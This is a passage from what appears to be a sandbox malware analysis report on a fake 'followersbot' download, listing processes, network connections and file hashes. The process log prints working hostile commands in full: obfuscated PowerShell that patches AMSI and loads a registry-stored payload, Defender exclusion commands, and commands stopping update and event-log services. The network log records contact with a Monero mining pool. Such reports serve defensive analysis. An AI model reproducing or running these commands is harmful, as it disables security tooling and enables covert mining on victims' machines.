Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0}

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5bacf96c-67db-4c19-9a07-6b84bce6b458}

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5060 /prefetch:2

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HIUOFKBL"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jsBBwFSiMSOA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XuIAgtFPvYHavm,[Parameter(Position=1)][Type]$MKdDtJgvOg)$PfHYSRNxgZY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+'Ans'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$PfHYSRNxgZY.DefineConstructor('R'+'T'+'Speci'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XuIAgtFPvYHavm).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$PfHYSRNxgZY.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+'i'+''+'r'+''+[Char](116)+''+'u'+'al',$MKdDtJgvOg,$XuIAgtFPvYHavm).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PfHYSRNxgZY.CreateType();}$kOKbJiaYMLkQT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$rQBPZBFvyUurXj=$kOKbJiaYMLkQT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,S'+'t'+''+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVZUuzjgWrLikZEaeyU=jsBBwFSiMSOA @([String])([IntPtr]);$orpEguWPHkXPZXrXjbVVBO=jsBBwFSiMSOA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IOkfBEGHQYW=$kOKbJiaYMLkQT.GetMethod(''+'G'+'e'+'t'+''+'M'+'o'+'d'+'ul'+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$rUlkBNhpIGipZg=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$ofwiIbrtKmiJKaSTR=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$pHaTkJQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUlkBNhpIGipZg,$EVZUuzjgWrLikZEaeyU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$ASBwPxmhZsbsjPPRa=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$pHaTkJQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ewTJZjpilC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,4,[ref]$ewTJZjpilC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ASBwPxmhZsbsjPPRa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,0x20,[ref]$ewTJZjpilC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+'r'+'s'+'t'+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:iDHfkoMYkNLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsmjiEJnYbJzNN,[Parameter(Position=1)][Type]$YWzTSnRgNX)$DilHVAVClKq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'dul'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DilHVAVClKq.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+'lN'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QsmjiEJnYbJzNN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$DilHVAVClKq.DefineMethod(''+[Char](73)+''+'n'+''+'v'+'o'+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$YWzTSnRgNX,$QsmjiEJnYbJzNN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $DilHVAVClKq.CreateType();}$ycRQcpyqZDPil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$KkyKndUTItPXvG=$ycRQcpyqZDPil.GetMethod(''+'G'+'e'+[Char](116)+'Pro'+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UVbndFTogdwGxvFnyAt=iDHfkoMYkNLb @([String])([IntPtr]);$zCwhPmYmctrvPRsuRzyVxM=iDHfkoMYkNLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uHiiOMqiOqk=$ycRQcpyqZDPil.GetMethod('G'+[Char](101)+'t'+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$QyKHXnkBaPmncH=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$XcLbDrsjcythStgYh=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$VwTyIoZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyKHXnkBaPmncH,$UVbndFTogdwGxvFnyAt).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$ahOoZlrjRInzsvYNc=$KkyKndUTItPXvG.Invoke($Null,@([Object]$VwTyIoZ,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QHEEOMZuNl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,4,[ref]$QHEEOMZuNl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ahOoZlrjRInzsvYNc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,0x20,[ref]$QHEEOMZuNl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+'ialers'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{844601dd-43a6-4ada-ac04-3f4917639d60}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{41a3914e-4c27-4356-b8f7-21113d07cebe}

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 5688 -ip 5688

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5688 -s 280

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 bit.ly udp
US 67.199.248.10:443 bit.ly tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 10.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 169.96.87.13.in-addr.arpa udp
US 8.8.8.8:53 5.144.216.31.in-addr.arpa udp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 11.127.203.66.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 15.125.203.66.in-addr.arpa udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 gfs206n460.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs208n207.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs204n309.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs270n460.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs240n124.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs214n200.userstorage.mega.co.nz udp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
BE 94.24.37.128:443 gfs206n460.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
FR 185.206.26.137:443 gfs208n207.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
NL 185.206.24.154:443 gfs204n309.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
SE 69.30.89.34:443 gfs240n124.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
ES 185.206.27.112:443 gfs214n200.userstorage.mega.co.nz tcp
US 8.8.8.8:53 154.24.206.185.in-addr.arpa udp
US 8.8.8.8:53 137.26.206.185.in-addr.arpa udp
US 8.8.8.8:53 128.37.24.94.in-addr.arpa udp
US 8.8.8.8:53 43.148.216.31.in-addr.arpa udp
US 8.8.8.8:53 34.89.30.69.in-addr.arpa udp
US 8.8.8.8:53 112.27.206.185.in-addr.arpa udp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
LU 31.216.148.43:443 gfs270n460.userstorage.mega.co.nz tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 51.11.108.188:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 188.108.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 146.59.154.106:10343 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 106.154.59.146.in-addr.arpa udp
US 8.8.8.8:53 users.roblox.com udp
DE 128.116.44.4:443 users.roblox.com tcp
US 8.8.8.8:53 thumbnails.roblox.com udp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 4.44.116.128.in-addr.arpa udp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
US 8.8.8.8:53 78.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
DE 128.116.44.4:443 thumbnails.roblox.com tcp
US 8.8.8.8:53 tr.rbxcdn.com udp
GB 2.18.190.78:443 tr.rbxcdn.com tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 78bc0ec5146f28b496567487b9233baf
SHA1 4b1794d6cbe18501a7745d9559aa91d0cb2a19c1
SHA256 f5e3afb09ca12cd22dd69c753ea12e85e9bf369df29e2b23e0149e16f946f109
SHA512 0561cbabde95e6b949f46deda7389fbe52c87bedeb520b88764f1020d42aa2c06adee63a7d416aad2b85dc332e6b6d2d045185c65ec8c2c60beac1f072ca184a

\??\pipe\LOCAL\crashpad_4660_OBUELAYIVHZVWVGC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a134f1844e0964bb17172c44ded4030f
SHA1 853de9d2c79d58138933a0b8cf76738e4b951d7e
SHA256 50f5a3aaba6fcbddddec498e157e3341f432998c698b96a4181f1c0239176589
SHA512 c124952f29503922dce11cf04c863966ac31f4445304c1412d584761f90f7964f3a150e32d95c1927442d4fa73549c67757a26d50a9995e14b96787df28f18b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba5c5937c8d342ab147cc52672e5ec5d
SHA1 56d55d27748f151bf6d2b5441716d10d5a34e186
SHA256 b01c13253dac9db98abdd7ab625353cbb84e79803b756705203b7d4e1f1ed0f5
